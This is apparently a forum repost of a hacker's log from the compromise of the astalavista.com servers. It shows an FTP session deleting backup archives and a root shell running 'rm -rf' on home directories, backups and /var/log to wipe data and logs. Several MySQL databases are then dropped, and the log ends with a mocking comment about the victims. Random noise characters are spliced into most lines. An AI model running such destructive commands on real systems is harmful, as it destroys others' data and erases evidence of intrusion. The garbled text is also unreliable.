227 Entering Passive Mode (212,254,194,163,2,189)
/ ` w ?8 J8 E, U150 Opening BINARY mode data connection for ‘file list’.* a' q5 r2 \2 w3 G3 E& O, a2 U
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar B# h+ G6 I% I; i2 n2 Y- _% g
-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz27 F. ~6 Q+ N, i, o
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2: ^8 J+ F1 Y) r; P$ A: k
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
7 e7 U. ~5 a+ m-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar. {' P& d1 _) l+ n
[snip]" E+ Z: I# a1 z% e' M5 ?4 i9 {
226 Transfer complete.
' }( H$ d: z# R* X, ]ftp> mdelete *
* G! m; ?& X* L) jftp> ls -la
" M0 ?% R+ z$ v6 r7 j X, w# Y4 O7 k227 Entering Passive Mode (212,254,194,163,2,193)
3 q! R3 `$ N3 L) S: z150 Opening BINARY mode data connection for ‘file list’.
6 |# w; N" M. h* V! q0 D4 b& @! `226 Transfer complete.
3 _! T7 \. L5 x* lftp>
3 z; Y8 x+ N$ w6 B! j }( z! L/ n( _; {, h% I `
sh-3.2# cd /home
# g9 ^: g- m) L# d% C$ gsh-3.2# ls -la
4 x. r3 k% e3 @' g+ C8 l2 @total 120
9 j$ r' W8 m& @4 Cdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ./ r+ {/ o. a/ ]+ A2 i
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .." Q6 I/ E5 `( I' X" @
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
( W4 c+ x9 S' u5 K-rw——- 1 root root 8192 Jun 4 03:03 aquota.group; }: Q8 L1 o6 I$ }" B8 o
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
1 |7 p% Z8 o* rdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
6 W0 b% Y: e4 c, C, Xdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup' D7 `9 B/ j6 n
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141610 a$ A. q1 Y8 R8 {: |" c `. I; b. H& l
drwx–x–x 10 com com 4096 Apr 28 12:40 com7 ? g4 d# l5 ^ G& W
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
/ R, w9 X4 P, m; Z8 Sdrwx—— 3 jon jon 4096 Sep 21 2007 jon' g) M7 I8 k8 E0 }# H
drwx—— 2 root root 16384 Sep 11 2007 lost+found
) |$ ~- S1 N2 l" n+ O# Sdrwxr-xr-x 2 root root 4096 Sep 14 2007 my
e/ k5 u$ Q) Q- i5 H" hdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
/ t2 `5 M$ H8 R& F& A' y! hdrwx—— 2 jon jon 4096 Sep 15 2007 test b& Q, o9 C Y0 o E+ r; x; [
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
3 A: E2 ` V( ], x$ J5 w" x/ G P
sh-3.2# rm -rf backup/
6 Y' G D! i) g. l4 vsh-3.2# rm -rf backup.14161/
2 Y& i, _( J6 f$ N* L+ N ?; _, Ish-3.2# rm -rf ftp// a3 N- Y1 f& i A ^% L5 P
sh-3.2# rm -rf jon/
( z% P, Z6 K3 w& ysh-3.2# rm -rf my/
$ B. p& f9 ~7 F( i4 w O2 W/ osh-3.2# rm -rf mysqldata/
( A7 [6 k+ H h" wsh-3.2# rm -rf test/# q; a6 v$ `* Z* u& B& F
sh-3.2# rm -rf tmp/
* F' l! j! l- b Q( K, h* psh-3.2# cd ~6 d# C8 O6 e# P+ K
sh-3.2# rm -rf *7 Y. j( d D* _' I' a" e
sh-3.2# rm -rf /var/log/% W5 x, u/ L7 M. M6 f
rm: cannot remove directory `/var/log//proftpd’: Directory not empty u9 \; F* q1 ^7 u# `6 h
sh-3.2# rm -rf /home/*4 _( Y3 m% w+ V) h, l) R7 l
sh-3.2# mysql
. @" X& G( R+ r) `+ U' ]1 k8 ^. tWelcome to the MySQL monitor. Commands end with ; or \g.- a0 T. e0 \+ E8 {' K
Your MySQL connection id is 407156
4 T1 h/ J- \/ V) L& nServer version: 5.0.45-community-log MySQL Community Edition (GPL). X2 [2 M9 c* e5 b) k- p) |9 m- r
4 G$ Z& R e7 a
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.+ P0 C+ [( s5 l) Z4 F& W
% c# r2 T- q* w4 b) j X3 j, h
mysql> show databases;
7 F! W/ U5 V* Z+———————–+0 m; A; x" P2 ~* J8 k C) M
| Database |
. u" q1 J- [2 l# s/ N+ V' r& t+———————–+6 Q( U5 Z0 C5 H' p# N( u$ S/ v
| information_schema |# [" C6 _9 B# Y$ G P/ e* b; l( Z
| astanet_ads |" U3 o7 g7 t6 _1 g
| astanet_mailing_lists |
, T- A9 u3 P, }2 Q6 }0 k( {7 _| astanet_mediawiki |+ I/ N0 g2 r- T6 G( o+ `
| astanet_membersystem |+ g& I t, H3 E4 v; j. J
| com_contrexx |
0 a$ T, K- p h# o! V| com_contrexx2 |
$ k' P( @. E9 j" V( l' N* e: ?| com_contrexx2_live |$ j( u$ k: B3 q+ `
| da_roundcube |
& p ^7 h2 c, W5 f- ?$ a| dolphin |
5 o. U- v5 t3 V. r| ideapool |9 ?$ @0 b; ~/ p! b
| mysql |
( O4 ]& `: ^$ f, T- B4 O| test |
- K" m h; v0 ^| yourmaster |: ]5 P! ^2 S/ |* Y+ ^3 h" Y
+———————–+
+ f+ s( ]8 a* P u3 O14 rows in set (0.03 sec)
, R% |* q) }" O
5 S$ H/ l! _. U) S7 N" M/ Wmysql> drop database astanet_membersystem;
8 r6 I |9 o' E* B. |droQuery OK, 46 rows affected (0.81 sec)2 i3 c( J9 u. ^6 u- |0 a" j. b
! ^: ?+ d6 t+ Mmysql> drop database com_contrexx;
4 D$ f5 A, z' v) n4 B: h+ R; _" u( }Query OK, 211 rows affected (2.72 sec)
+ D4 [" m) `9 H9 G( U, A. l7 G$ ^: G& D
mysql> drop database com_contrexx2;
8 ]$ n; R1 C9 m3 r7 VQuery OK, 237 rows affected (2.23 sec)2 E2 U* P0 \/ Q0 R h9 Y
4 C2 g5 }+ z3 t5 c3 q6 z! _mysql> drop database com_contrexx2_live;( }) F& S+ M0 `: q8 J
Query OK, 227 rows affected (7.63 sec)
4 G* d9 p" b3 w( W9 ^( z ?
w2 B$ P. }- r) q6 V: wmysql> drop database ideapool;# c: Z ?( W, u
Query OK, 69 rows affected (0.19 sec)
' O; G2 z, D) j1 {3 E" ^8 P; v' Q1 ?3 ?9 b/ ?1 V: G r! B
mysql> drop database yourmaster;
- q, ^. p: O d4 [Query OK, 158 rows affected (0.55 sec)
7 G; T- U+ w& h0 [- N
) x- K, k& g& g! e+ C" M' c/ I. B) ymysql> drop database astanet_ads;# T2 L. f/ X# j! _7 K! a
Query OK, 9 rows affected (0.11 sec)
- S) R2 H* C, P- N/ o2 N" K0 T/ z( r$ b
mysql> drop database astanet_mailing_lists;
% [- f2 A( b) \* y- v- u3 ]. OQuery OK, 24 rows affected (1.47 sec)* O) L. d; J4 j. K! l6 }- R
9 C0 C" n9 G; T; w- Vmysql> drop database astanet_mediawiki;7 c0 g |, O' |2 s% a
Query OK, 31 rows affected (0.51 sec)$ E8 U, z" }( n: \1 G7 }% y1 |
) m. |2 p0 @$ @" Y8 U& n. imysql> show databases;6 w/ v v9 O7 t7 z& m
+——————–+' |$ d u4 ^: p8 v# B! V2 s8 p* N
| Database |5 c$ g- v, j& ^/ l7 e3 Z
+——————–+
' b3 W& j2 h' S: h* _: M; e( S| information_schema |
- C F" K* C$ L2 `| da_roundcube |
9 H" R# e' N) H# \| dolphin |
# h' W6 {9 f9 @8 P5 X/ ?% e6 A| mysql |: Z$ g/ Q# R$ d0 g; ^
| test |
) Q5 z" R3 L0 A1 K+ O+——————–+
/ {5 ^+ k5 q* {( Z* {, w9 s9 Q4 U5 rows in set (0.00 sec)0 ]# h" N M& k% ^+ g
2 T9 D) H! d! c8 o) ^ v, w3 FWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
' @7 Y) [8 B: N a2 D% f6 Gtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the" o4 M8 p! f1 S; H0 h) U7 g8 x P" H
wrong to say this pack of morons *wont be back*., A4 J$ j# w* X, a1 {/ i9 }
|
发表于 2012-11-6 21:07:34
收藏
支持
反对